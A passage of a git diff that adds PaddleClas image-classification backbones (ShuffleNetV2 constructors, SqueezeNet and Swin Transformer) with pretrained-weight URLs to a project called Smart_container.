ShuffleNet(scale=0.33, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_33"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x0_5(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=0.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_5"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x1_0(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x1_0"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x1_5(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=1.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x1_5"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x2_0(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=2.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x2_0"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_swish(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=1.0, act="swish", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_swish"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/squeezenet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/squeezenet.py new file mode 100644 index 0000000..647cd2e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/squeezenet.py @@ -0,0 +1,194 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SqueezeNet1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SqueezeNet1_0_pretrained.pdparams", + "SqueezeNet1_1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SqueezeNet1_1_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class MakeFireConv(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + padding=0, + name=None): + super(MakeFireConv, self).__init__() + self._conv = Conv2D( + input_channels, + output_channels, + filter_size, + padding=padding, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=ParamAttr(name=name + "_offset")) + + def forward(self, x): + x = self._conv(x) + x = F.relu(x) + return x + + +class MakeFire(nn.Layer): + def __init__(self, + input_channels, + squeeze_channels, + expand1x1_channels, + expand3x3_channels, + name=None): + super(MakeFire, self).__init__() + self._conv = MakeFireConv( + input_channels, squeeze_channels, 1, name=name + "_squeeze1x1") + self._conv_path1 = MakeFireConv( + squeeze_channels, expand1x1_channels, 1, name=name + "_expand1x1") + self._conv_path2 = MakeFireConv( + squeeze_channels, + expand3x3_channels, + 3, + padding=1, + name=name + "_expand3x3") + + def forward(self, inputs): + x = self._conv(inputs) + x1 = self._conv_path1(x) + x2 = self._conv_path2(x) + return paddle.concat([x1, x2], axis=1) + + +class SqueezeNet(nn.Layer): + def __init__(self, version, class_num=1000): + super(SqueezeNet, self).__init__() + self.version = version + + if self.version == "1.0": + self._conv = Conv2D( + 3, + 96, + 7, + stride=2, + weight_attr=ParamAttr(name="conv1_weights"), + bias_attr=ParamAttr(name="conv1_offset")) + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv1 = MakeFire(96, 16, 64, 64, name="fire2") + self._conv2 = MakeFire(128, 16, 64, 64, name="fire3") + self._conv3 = MakeFire(128, 32, 128, 128, name="fire4") + + self._conv4 = MakeFire(256, 32, 128, 128, name="fire5") + self._conv5 = MakeFire(256, 48, 192, 192, name="fire6") + self._conv6 = MakeFire(384, 48, 192, 192, name="fire7") + self._conv7 = MakeFire(384, 64, 256, 256, name="fire8") + + self._conv8 = MakeFire(512, 64, 256, 256, name="fire9") + else: + self._conv = Conv2D( + 3, + 64, + 3, + stride=2, + padding=1, + weight_attr=ParamAttr(name="conv1_weights"), + bias_attr=ParamAttr(name="conv1_offset")) + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv1 = MakeFire(64, 16, 64, 64, name="fire2") + self._conv2 = MakeFire(128, 16, 64, 64, name="fire3") + + self._conv3 = MakeFire(128, 32, 128, 128, name="fire4") + self._conv4 = MakeFire(256, 32, 128, 128, name="fire5") + + self._conv5 = MakeFire(256, 48, 192, 192, name="fire6") + self._conv6 = MakeFire(384, 48, 192, 192, name="fire7") + self._conv7 = MakeFire(384, 64, 256, 256, name="fire8") + self._conv8 = MakeFire(512, 64, 256, 256, name="fire9") + + self._drop = Dropout(p=0.5, mode="downscale_in_infer") + self._conv9 = Conv2D( + 512, + class_num, + 1, + weight_attr=ParamAttr(name="conv10_weights"), + bias_attr=ParamAttr(name="conv10_offset")) + self._avg_pool = AdaptiveAvgPool2D(1) + + def forward(self, inputs): + x = self._conv(inputs) + x = F.relu(x) + x = self._pool(x) + if self.version == "1.0": + x = self._conv1(x) + x = self._conv2(x) + x = self._conv3(x) + x = self._pool(x) + x = self._conv4(x) + x = self._conv5(x) + x = self._conv6(x) + x = self._conv7(x) + x = self._pool(x) + x = self._conv8(x) + else: + x = self._conv1(x) + x = self._conv2(x) + x = self._pool(x) + x = self._conv3(x) + x = self._conv4(x) + x = self._pool(x) + x = self._conv5(x) + x = self._conv6(x) + x = self._conv7(x) + x = self._conv8(x) + x = self._drop(x) + x = self._conv9(x) + x = F.relu(x) + x = self._avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SqueezeNet1_0(pretrained=False, use_ssld=False, **kwargs): + model = SqueezeNet(version="1.0", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SqueezeNet1_0"], use_ssld=use_ssld) + return model + + +def SqueezeNet1_1(pretrained=False, use_ssld=False, **kwargs): + model = SqueezeNet(version="1.1", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SqueezeNet1_1"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py new file mode 100644 index 0000000..8ce810c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py @@ -0,0 +1,856 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# Reference: https://github.com/microsoft/Swin-Transformer + +import numpy as np +import paddle +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn.initializer import TruncatedNormal, Constant + +from .vision_transformer import trunc_normal_, zeros_, ones_, to_2tuple, DropPath, Identity + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SwinTransformer_tiny_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_tiny_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_small_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_small_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_base_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_base_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_base_patch4_window12_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_base_patch4_window12_384_pretrained.pdparams", + "SwinTransformer_large_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_large_patch4_window7_224_22kto1k_pretrained.pdparams", + "SwinTransformer_large_patch4_window12_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_large_patch4_window12_384_22kto1k_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class Mlp(nn.Layer): + def __init__(self, + in_features, + hidden_features=None, + out_features=None, + act_layer=nn.GELU, + drop=0.): + super().__init__() + out_features = out_features or in_features + hidden_features = hidden_features or in_features + self.fc1 = nn.Linear(in_features, hidden_features) + self.act = act_layer() + self.fc2 = nn.Linear(hidden_features, out_features) + self.drop = nn.Dropout(drop) + + def forward(self, x): + x = self.fc1(x) + x = self.act(x) + x = self.drop(x) + x = self.fc2(x) + x = self.drop(x) + return x + + +def window_partition(x, window_size): + """ + Args: + x: (B, H, W, C) + window_size (int): window size + + Returns: + windows: (num_windows*B, window_size, window_size, C) + """ + B, H, W, C = x.shape + x = x.reshape( + [B, H // window_size, window_size, W // window_size, window_size, C]) + windows = x.transpose([0, 1, 3, 2, 4, 5]).reshape( + [-1, window_size, window_size, C]) + return windows + + +def window_reverse(windows, window_size, H, W, C): + """ + Args: + windows: (num_windows*B, window_size, window_size, C) + window_size (int): Window size + H (int): Height of image + W (int): Width of image + + Returns: + x: (B, H, W, C) + """ + x = windows.reshape( + [-1, H // window_size, W // window_size, window_size, window_size, C]) + x = x.transpose([0, 1, 3, 2, 4, 5]).reshape([-1, H, W, C]) + return x + + +class WindowAttention(nn.Layer): + r""" Window based multi-head self attention (W-MSA) module with relative position bias. + It supports both of shifted and non-shifted window. + + Args: + dim (int): Number of input channels. + window_size (tuple[int]): The height and width of the window. + num_heads (int): Number of attention heads. + qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set + attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0 + proj_drop (float, optional): Dropout ratio of output. Default: 0.0 + """ + + def __init__(self, + dim, + window_size, + num_heads, + qkv_bias=True, + qk_scale=None, + attn_drop=0., + proj_drop=0.): + super().__init__() + self.dim = dim + self.window_size = window_size # Wh, Ww + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + # define a parameter table of relative position bias + # 2*Wh-1 * 2*Ww-1, nH + self.relative_position_bias_table = self.create_parameter( + shape=((2 * window_size[0] - 1) * (2 * window_size[1] - 1), + num_heads), + default_initializer=zeros_) + self.add_parameter("relative_position_bias_table", + self.relative_position_bias_table) + + # get pair-wise relative position index for each token inside the window + coords_h = paddle.arange(self.window_size[0]) + coords_w = paddle.arange(self.window_size[1]) + coords = paddle.stack(paddle.meshgrid( + [coords_h, coords_w])) # 2, Wh, Ww + coords_flatten = paddle.flatten(coords, 1) # 2, Wh*Ww + + coords_flatten_1 = coords_flatten.unsqueeze(axis=2) + coords_flatten_2 = coords_flatten.unsqueeze(axis=1) + relative_coords = coords_flatten_1 - coords_flatten_2 + + relative_coords = relative_coords.transpose( + [1, 2, 0]) # Wh*Ww, Wh*Ww, 2 + relative_coords[:, :, 0] += self.window_size[ + 0] - 1 # shift to start from 0 + relative_coords[:, :, 1] += self.window_size[1] - 1 + relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 + relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww + self.register_buffer("relative_position_index", + relative_position_index) + + self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + trunc_normal_(self.relative_position_bias_table) + self.softmax = nn.Softmax(axis=-1) + + def forward(self, x, mask=None): + """ + Args: + x: input features with shape of (num_windows*B, N, C) + mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None + """ + B_, N, C = x.shape + qkv = self.qkv(x).reshape( + [B_, N, 3, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + q, k, v = qkv[0], qkv[1], qkv[2] + + q = q * self.scale + attn = paddle.mm(q, k.transpose([0, 1, 3, 2])) + + index = self.relative_position_index.reshape([-1]) + + relative_position_bias = paddle.index_select( + self.relative_position_bias_table, index) + relative_position_bias = relative_position_bias.reshape([ + self.window_size[0] * self.window_size[1], + self.window_size[0] * self.window_size[1], -1 + ]) # Wh*Ww,Wh*Ww,nH + + relative_position_bias = relative_position_bias.transpose( + [2, 0, 1]) # nH, Wh*Ww, Wh*Ww + attn = attn + relative_position_bias.unsqueeze(0) + + if mask is not None: + nW = mask.shape[0] + attn = attn.reshape([B_ // nW, nW, self.num_heads, N, N + ]) + mask.unsqueeze(1).unsqueeze(0) + attn = attn.reshape([-1, self.num_heads, N, N]) + attn = self.softmax(attn) + else: + attn = self.softmax(attn) + + attn = self.attn_drop(attn) + + # x = (attn @ v).transpose(1, 2).reshape([B_, N, C]) + x = paddle.mm(attn, v).transpose([0, 2, 1, 3]).reshape([B_, N, C]) + x = self.proj(x) + x = self.proj_drop(x) + return x + + def extra_repr(self): + return "dim={}, window_size={}, num_heads={}".format( + self.dim, self.window_size, self.num_heads) + + def flops(self, N): + # calculate flops for 1 window with token length of N + flops = 0 + # qkv = self.qkv(x) + flops += N * self.dim * 3 * self.dim + # attn = (q @ k.transpose(-2, -1)) + flops += self.num_heads * N * (self.dim // self.num_heads) * N + # x = (attn @ v) + flops += self.num_heads * N * N * (self.dim // self.num_heads) + # x = self.proj(x) + flops += N * self.dim * self.dim + return flops + + +class SwinTransformerBlock(nn.Layer): + r""" Swin Transformer Block. + + Args: + dim (int): Number of input channels. + input_resolution (tuple[int]): Input resulotion. + num_heads (int): Number of attention heads. + window_size (int): Window size. + shift_size (int): Shift size for SW-MSA. + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. + qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. + drop (float, optional): Dropout rate. Default: 0.0 + attn_drop (float, optional): Attention dropout rate. Default: 0.0 + drop_path (float, optional): Stochastic depth rate. Default: 0.0 + act_layer (nn.Layer, optional): Activation layer. Default: nn.GELU + norm_layer (nn.Layer, optional): Normalization layer. Default: nn.LayerNorm + """ + + def __init__(self, + dim, + input_resolution, + num_heads, + window_size=7, + shift_size=0, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm): + super().__init__() + self.dim = dim + self.input_resolution = input_resolution + self.num_heads = num_heads + self.window_size = window_size + self.shift_size = shift_size + self.mlp_ratio = mlp_ratio + if min(self.input_resolution) <= self.window_size: + # if window size is larger than input resolution, we don't partition windows + self.shift_size = 0 + self.window_size = min(self.input_resolution) + assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" + + self.norm1 = norm_layer(dim) + self.attn = WindowAttention( + dim, + window_size=to_2tuple(self.window_size), + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop) + + self.drop_path = DropPath(drop_path) if drop_path > 0. else Identity() + self.norm2 = norm_layer(dim) + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + if self.shift_size > 0: + # calculate attention mask for SW-MSA + H, W = self.input_resolution + img_mask = paddle.zeros((1, H, W, 1)) # 1 H W 1 + h_slices = (slice(0, -self.window_size), + slice(-self.window_size, -self.shift_size), + slice(-self.shift_size, None)) + w_slices = (slice(0, -self.window_size), + slice(-self.window_size, -self.shift_size), + slice(-self.shift_size, None)) + cnt = 0 + for h in h_slices: + for w in w_slices: + img_mask[:, h, w, :] = cnt + cnt += 1 + + mask_windows = window_partition( + img_mask, self.window_size) # nW, window_size, window_size, 1 + mask_windows = mask_windows.reshape( + [-1, self.window_size * self.window_size]) + attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) + + huns = -100.0 * paddle.ones_like(attn_mask) + attn_mask = huns * (attn_mask != 0).astype("float32") + else: + attn_mask = None + + self.register_buffer("attn_mask", attn_mask) + + def forward(self, x): + H, W = self.input_resolution + B, L, C = x.shape + assert L == H * W, "input feature has wrong size" + + shortcut = x + x = self.norm1(x) + x = x.reshape([B, H, W, C]) + + # cyclic shift + if self.shift_size > 0: + shifted_x = paddle.roll( + x, shifts=(-self.shift_size, -self.shift_size), axis=(1, 2)) + else: + shifted_x = x + + # partition windows + x_windows = window_partition( + shifted_x, self.window_size) # nW*B, window_size, window_size, C + x_windows = x_windows.reshape( + [-1, self.window_size * self.window_size, + C]) # nW*B, window_size*window_size, C + + # W-MSA/SW-MSA + attn_windows = self.attn( + x_windows, mask=self.attn_mask) # nW*B, window_size*window_size, C + + # merge windows + attn_windows = attn_windows.reshape( + [-1, self.window_size, self.window_size, C]) + shifted_x = window_reverse(attn_windows, self.window_size, H, W, + C) # B H' W' C + + # reverse cyclic shift + if self.shift_size > 0: + x = paddle.roll( + shifted_x, + shifts=(self.shift_size, self.shift_size), + axis=(1, 2)) + else: + x = shifted_x + x = x.reshape([B, H * W, C]) + + # FFN + x = shortcut + self.drop_path(x) + x = x + self.drop_path(self.mlp(self.norm2(x))) + + return x + + def extra_repr(self): + return "dim={}, input_resolution={}, num_heads={}, window_size={}, shift_size={}, mlp_ratio={}".format( + self.dim, self.input_resolution, self.num_heads, self.window_size, + self.shift_size, self.mlp_ratio) + + def flops(self): + flops = 0 + H, W = self.input_resolution + # norm1 + flops += self.dim * H * W + # W-MSA/SW-MSA + nW = H * W / self.window_size / self.window_size + flops += nW * self.attn.flops(self.window_size * self.window_size) + # mlp + flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio + # norm2 + flops += self.dim * H * W + return flops + + +class PatchMerging(nn.Layer): + r""" Patch Merging Layer. + + Args: + input_resolution (tuple[int]): Resolution of input feature. + dim (int): Number of input channels. + norm_layer (nn.Layer, optional): Normalization layer. Default: nn.LayerNorm + """ + + def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm): + super().__init__() + self.input_resolution = input_resolution + self.dim = dim + self.reduction = nn.Linear(4 * dim, 2 * dim, bias_attr=False) + self.norm = norm_layer(4 * dim) + + def forward(self, x): + """ + x: B, H*W, C + """ + H, W = self.input_resolution + B, L, C = x.shape + assert L == H * W, "input feature has wrong size" + assert H % 2 == 0 and W % 2 == 0, "x size ({}*{}) are not even.".format( + H, W) + + x = x.reshape([B, H, W, C]) + + x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C + x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C + x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C + x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C + x = paddle.concat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C + x = x.reshape([B, H * W // 4, 4 * C]) # B H/2*W/2 4*C + + x = self.norm(x) + x = self.reduction(x) + + return x + + def extra_repr(self): + return "input_resolution={}, dim={}".format(self.input_resolution, + self.dim) + + def flops(self): + H, W = self.input_resolution + flops = H * W * self.dim + flops += (H // 2) * (W // 2) * 4 * self.dim * 2 * self.dim + return flops + + +class BasicLayer(nn.Layer): + """ A basic Swin Transformer layer for one stage. + + Args: + dim (int): Number of input channels. + input_resolution (tuple[int]): Input resolution. + depth (int): Number of blocks. + num_heads (int): Number of attention heads. + window_size (int): Local window size. + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. + qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. + drop (float, optional): Dropout rate. Default: 0.0 + attn_drop (float, optional): Attention dropout rate. Default: 0.0 + drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 + norm_layer (nn.Layer, optional): Normalization layer. Default: nn.LayerNorm + downsample (nn.Layer | None, optional): Downsample layer at the end of the layer. Default: None + use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. + """ + + def __init__(self, + dim, + input_resolution, + depth, + num_heads, + window_size, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + norm_layer=nn.LayerNorm, + downsample=None, + use_checkpoint=False): + + super().__init__() + self.dim = dim + self.input_resolution = input_resolution + self.depth = depth + self.use_checkpoint = use_checkpoint + + # build blocks + self.blocks = nn.LayerList([ + SwinTransformerBlock( + dim=dim, + input_resolution=input_resolution, + num_heads=num_heads, + window_size=window_size, + shift_size=0 if (i % 2 == 0) else window_size // 2, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop, + attn_drop=attn_drop, + drop_path=drop_path[i] + if isinstance(drop_path, list) else drop_path, + norm_layer=norm_layer) for i in range(depth) + ]) + + # patch merging layer + if downsample is not None: + self.downsample = downsample( + input_resolution, dim=dim, norm_layer=norm_layer) + else: + self.downsample = None + + def forward(self, x): + for blk in self.blocks: + x = blk(x) + if self.downsample is not None: + x = self.downsample(x) + return x + + def extra_repr(self): + return "dim={}, input_resolution={}, depth={}".format( + self.dim, self.input_resolution, self.depth) + + def flops(self): + flops = 0 + for blk in self.blocks: + flops += blk.flops() + if self.downsample is not None: + flops += self.downsample.flops() + return flops + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding + + Args: + img_size (int): Image size. Default: 224. + patch_size (int): Patch token size. Default: 4. + in_chans (int): Number of input image channels. Default: 3. + embed_dim (int): Number of linear projection output channels. Default: 96. + norm_layer (nn.Layer, optional): Normalization layer. Default: None + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + embed_dim=96, + norm_layer=None): + super().__init__() + img_size = to_2tuple(img_size) + patch_size = to_2tuple(patch_size) + patches_resolution = [ + img_size[0] // patch_size[0], img_size[1] // patch_size[1] + ] + self.img_size = img_size + self.patch_size = patch_size + self.patches_resolution = patches_resolution + self.num_patches = patches_resolution[0] * patches_resolution[1] + + self.in_chans = in_chans + self.embed_dim = embed_dim + + self.proj = nn.Conv2D( + in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) + if norm_layer is not None: + self.norm = norm_layer(embed_dim) + else: + self.norm = None + + def forward(self, x): + B, C, H, W = x.shape + # TODO (littletomatodonkey), uncomment the line will cause failure of jit.save + # assert [H, W] == self.img_size[:2], "Input image size ({H}*{W}) doesn't match model ({}*{}).".format(H, W, self.img_size[0], self.img_size[1]) + x = self.proj(x) + + x = x.flatten(2).transpose([0, 2, 1]) # B Ph*Pw C + if self.norm is not None: + x = self.norm(x) + return x + + def flops(self): + Ho, Wo = self.patches_resolution + flops = Ho * Wo * self.embed_dim * self.in_chans * ( + self.patch_size[0] * self.patch_size[1]) + if self.norm is not None: + flops += Ho * Wo * self.embed_dim + return flops + + +class SwinTransformer(nn.Layer): + """ Swin Transformer + A PaddlePaddle impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows` - + https://arxiv.org/pdf/2103.14030 + + Args: + img_size (int | tuple(int)): Input image size. Default 224 + patch_size (int | tuple(int)): Patch size. Default: 4 + in_chans (int): Number of input image channels. Default: 3 + num_classes (int): Number of classes for classification head. Default: 1000 + embed_dim (int): Patch embedding dimension. Default: 96 + depths (tuple(int)): Depth of each Swin Transformer layer. + num_heads (tuple(int)): Number of attention heads in different layers. + window_size (int): Window size. Default: 7 + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4 + qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None + drop_rate (float): Dropout rate. Default: 0 + attn_drop_rate (float): Attention dropout rate. Default: 0 + drop_path_rate (float): Stochastic depth rate. Default: 0.1 + norm_layer (nn.Layer): Normalization layer. Default: nn.LayerNorm. + ape (bool): If True, add absolute position embedding to the patch embedding. Default: False + patch_norm (bool): If True, add normalization after patch embedding. Default: True + use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + class_num=1000, + embed_dim=96, + depths=[2, 2, 6, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0.1, + norm_layer=nn.LayerNorm, + ape=False, + patch_norm=True, + use_checkpoint=False, + **kwargs): + super(SwinTransformer, self).__init__() + + self.num_classes = num_classes = class_num + self.num_layers = len(depths) + self.embed_dim = embed_dim + self.ape = ape + self.patch_norm = patch_norm + self.num_features = int(embed_dim * 2**(self.num_layers - 1)) + self.mlp_ratio = mlp_ratio + + # split image into non-overlapping patches + self.patch_embed = PatchEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + embed_dim=embed_dim, + norm_layer=norm_layer if self.patch_norm else None) + num_patches = self.patch_embed.num_patches + patches_resolution = self.patch_embed.patches_resolution + self.patches_resolution = patches_resolution + + # absolute position embedding + if self.ape: + self.absolute_pos_embed = self.create_parameter( + shape=(1, num_patches, embed_dim), default_initializer=zeros_) + self.add_parameter("absolute_pos_embed", self.absolute_pos_embed) + trunc_normal_(self.absolute_pos_embed) + + self.pos_drop = nn.Dropout(p=drop_rate) + + # stochastic depth + dpr = np.linspace(0, drop_path_rate, + sum(depths)).tolist() # stochastic depth decay rule + + # build layers + self.layers = nn.LayerList() + for i_layer in range(self.num_layers): + layer = BasicLayer( + dim=int(embed_dim * 2**i_layer), + input_resolution=(patches_resolution[0] // (2**i_layer), + patches_resolution[1] // (2**i_layer)), + depth=depths[i_layer], + num_heads=num_heads[i_layer], + window_size=window_size, + mlp_ratio=self.mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])], + norm_layer=norm_layer, + downsample=PatchMerging + if (i_layer < self.num_layers - 1) else None, + use_checkpoint=use_checkpoint) + self.layers.append(layer) + + self.norm = norm_layer(self.num_features) + self.avgpool = nn.AdaptiveAvgPool1D(1) + self.head = nn.Linear( + self.num_features, + num_classes) if self.num_classes > 0 else nn.Identity() + + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + x = self.patch_embed(x) + if self.ape: + x = x + self.absolute_pos_embed + x = self.pos_drop(x) + + for layer in self.layers: + x = layer(x) + + x = self.norm(x) # B L C + x = self.avgpool(x.transpose([0, 2, 1])) # B C 1 + x = paddle.flatten(x, 1) + return x + + def forward(self, x): + x = self.forward_features(x) + x = self.head(x) + return x + + def flops(self): + flops = 0 + flops += self.patch_embed.flops() + for _, layer in enumerate(self.layers): + flops += layer.flops() + flops += self.num_features * self.patches_resolution[ + 0] * self.patches_resolution[1] // (2**self.num_layers) + flops += self.num_features * self.num_classes + return flops + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SwinTransformer_tiny_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=96, + depths=[2, 2, 6, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + drop_path_rate=0.2, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_tiny_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_small_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=96, + depths=[2, 2, 18, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_small_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_base_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=128, + depths=[2, 2, 18, 2], + num_heads=[4, 8, 16, 32], + window_size=7, + drop_path_rate=0.5, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_base_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_base_patch4_window12_384(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + img_size=384, + embed_dim=128, + 